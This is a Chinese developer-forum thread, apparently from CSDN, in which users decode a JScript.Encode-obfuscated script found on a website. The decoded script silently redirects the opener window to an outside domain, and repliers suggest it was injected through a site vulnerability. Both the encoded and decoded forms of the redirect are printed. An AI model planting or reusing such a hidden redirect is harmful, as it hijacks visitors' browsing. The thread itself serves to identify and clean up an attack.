<SCRIPT language = JScript.Encode>#@~^hwAAAA==~,P~,P,PP,P,~P,P~P,P~~,PP,~P,PP,~~P,P,P~P@#@&b0cwm.+ Y AbxNGAcW2+ nM#~alM+xDRSrx9WARKwnUDR^GmmYkKUxB4YDwlz&80 T!+ m zrU9+6qqctO:EI@#@&9SMAAA==^#~@</SCRIPT> 这是什么东西啊?

解决方案 »

  1.   

    解密后就是这个:<SCRIPT language = JScript>                                         
    if(pare-t.window.ope-er) parent.window.opener.location='http://bk2006.c-/index11.htm';
    </SCRIPT>
      

  2.   

    if(parent.window.opener) parent.window.opener.location='http://bk2006.cn/index11.htm';当父窗口有新窗口打开时候,将新打开的窗口的url设为
    'http://bk2006.cn/index11.htm'
      

  3.   

    存在注入漏洞
    检查SQL操作和JS,还有服务器漏洞
      

  4.   

    这样都能解密?CSDN牛人无处不在啊
      

  5.   

    unescape function :
    eg:unescape('Your Fuck Url')
      

  6.   

    好强,最近老发现网站静态页中文变成乱码,(网站用netcms做的),有人知道遇到过吗?
    更新一下就没事儿了,过段时间又被改了。
    牛人们给猜一下,问题在哪儿?
      

  7.   

    http://topic.csdn.net/u/20090729/14/26381958-0d6e-4b90-bc90-d275e9621f93.html